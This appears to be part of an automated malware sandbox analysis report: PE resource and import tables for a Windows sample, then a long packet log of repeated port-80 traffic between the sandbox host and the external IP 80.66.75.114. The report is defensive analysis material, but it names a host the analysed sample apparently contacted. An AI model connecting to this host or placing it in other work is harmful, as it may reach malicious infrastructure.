| RT_STRING | 0x81e68 | 0x620 | data | Tamil | Sri Lanka | 0.4343112244897959 |
| RT_STRING | 0x82488 | 0x292 | data | Tamil | India | 0.4817629179331307 |
| RT_STRING | 0x82488 | 0x292 | data | Tamil | Sri Lanka | 0.4817629179331307 |
| RT_ACCELERATOR | 0x7d148 | 0x48 | data | Tamil | India | 0.8472222222222222 |
| RT_ACCELERATOR | 0x7d148 | 0x48 | data | Tamil | Sri Lanka | 0.8472222222222222 |
| RT_GROUP_CURSOR | 0x7d5f0 | 0x22 | data | | | 1.0294117647058822 |
| RT_GROUP_CURSOR | 0x7f2d0 | 0x30 | data | | | 0.9375 |
| RT_GROUP_CURSOR | 0x80fb8 | 0x30 | data | | | 0.9375 |
| RT_GROUP_ICON | 0x768a8 | 0x68 | data | Tamil | India | 0.7019230769230769 |
| RT_GROUP_ICON | 0x768a8 | 0x68 | data | Tamil | Sri Lanka | 0.7019230769230769 |
| RT_GROUP_ICON | 0x70748 | 0x68 | data | Tamil | India | 0.6826923076923077 |
| RT_GROUP_ICON | 0x70748 | 0x68 | data | Tamil | Sri Lanka | 0.6826923076923077 |
| RT_GROUP_ICON | 0x7d0d0 | 0x76 | data | Tamil | India | 0.6779661016949152 |
| RT_GROUP_ICON | 0x7d0d0 | 0x76 | data | Tamil | Sri Lanka | 0.6779661016949152 |
| RT_VERSION | 0x80fe8 | 0x25c | data | | | 0.5413907284768212 |
| DLL | Import |
|---|---|
| KERNEL32.dll | CommConfigDialogA, InterlockedIncrement, EnumCalendarInfoW, InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, GetConsoleAliasExesA, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetFileTime, WaitForDebugEvent, GetShortPathNameW, GetDiskFreeSpaceExA, GetCurrentProcessId, GetTempPathA, LCMapStringW, WriteConsoleW, ReadFile, GetLocaleInfoA, EnumCalendarInfoA, SetFilePointer, WriteConsoleInputW, VerifyVersionInfoW, GetProcessHeap, SetEndOfFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, SetStdHandle, CreateFileA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, HeapSize, GetModuleHandleW, ExitProcess, InitializeCriticalSectionAndSpinCount, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, SetHandleCount, GetFileType, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetLocaleInfoW, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetStringTypeW, CloseHandle, CreateFileW |
| USER32.dll | GetMenuInfo |
| GDI32.dll | CreateDCW, GetCharWidthI, CreateDCA, GetCharWidth32A |
| ole32.dll | StringFromIID, CoSuspendClassObjects, CoRegisterPSClsid |
| WINHTTP.dll | WinHttpOpen, WinHttpCheckPlatform |
| Language of compilation system | Country where language is spoken |
|---|---|
| Tamil | India |
| Tamil | Sri Lanka |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Oct 8, 2024 04:24:22.835894108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:22.840714931 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:23.061348915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:23.061414957 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:25.084901094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:25.089735031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:25.314899921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:25.317240000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:27.335062027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:27.340095997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:27.563453913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:27.563519001 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:29.585211992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:29.590142965 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:29.827352047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:29.827415943 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:31.850446939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:32.068552017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:32.381088018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:32.576001883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.576951981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.576965094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.794883013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:32.795245886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:34.820627928 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:34.849895000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:35.065159082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:35.065212011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.116286039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.121752977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355118990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355138063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355153084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355163097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355173111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355184078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355192900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355215073 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355259895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355268002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355273008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355319977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355319977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355349064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355359077 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355367899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.355391026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.355416059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.473999023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474018097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474026918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474061012 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474097013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474107027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474127054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474185944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474214077 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474277973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474277973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474400043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474411964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474421978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474448919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474466085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474556923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474567890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474579096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474587917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474601030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474631071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474751949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474807024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474817038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.474829912 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.474847078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475337029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475347996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475357056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475368023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475379944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475393057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475400925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475405931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475413084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475424051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475429058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475435019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.475455999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.475477934 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593200922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593241930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593252897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593264103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593281984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593285084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593319893 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593329906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593333960 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593343019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593368053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593379974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593379974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593391895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593404055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593416929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593446016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593446016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593521118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593533039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593543053 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593554020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593559027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593566895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593571901 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593579054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593589067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593599081 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.593600988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593625069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.593683958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594238997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594249964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594264984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594274044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594284058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594295025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594311953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594338894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594501972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594546080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594553947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594564915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594592094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594608068 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594613075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594624043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594634056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594645023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.594655037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.594687939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595194101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595208883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595218897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595227957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595238924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595253944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595289946 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595298052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595308065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595316887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595331907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595338106 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595347881 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595350027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595364094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595374107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595375061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595395088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595395088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595416069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595419884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595442057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595465899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595971107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595982075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595992088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.596002102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.596012115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.596019983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.596035004 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.596065998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712043047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712058067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712069035 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712142944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712173939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712251902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712263107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712272882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712282896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712294102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712301016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712305069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712317944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712331057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712342978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712373018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712424994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712436914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712470055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712496996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712513924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712524891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712536097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712541103 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712548018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712564945 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712589025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712748051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712759972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712769985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712795973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712811947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712831974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712842941 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712852955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712865114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712872028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712887049 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712913036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712925911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712937117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712948084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712958097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712968111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712973118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712990999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712999105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713016987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713042974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713443995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713455915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713465929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713493109 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713510036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713601112 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713612080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713622093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713641882 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713659048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713684082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713696003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713706017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713717937 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713737011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713757992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713767052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713777065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713787079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713793039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713799953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713805914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713874102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713942051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713953018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323400974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323417902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323427916 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323436975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323457956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323478937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323486090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323494911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323507071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323515892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323523998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323534012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323564053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323587894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323599100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323631048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323652029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323661089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323671103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323685884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323710918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323738098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323749065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323757887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323766947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323771954 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323787928 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323791027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323801041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323808908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323817015 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323824883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323832989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323842049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323843956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323852062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323863029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323864937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323885918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323908091 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323980093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323990107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323999882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324029922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324042082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324057102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324067116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324074984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324084044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324095011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324096918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324107885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324110031 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324140072 CEST4973880192.168.2.680.66.75.114
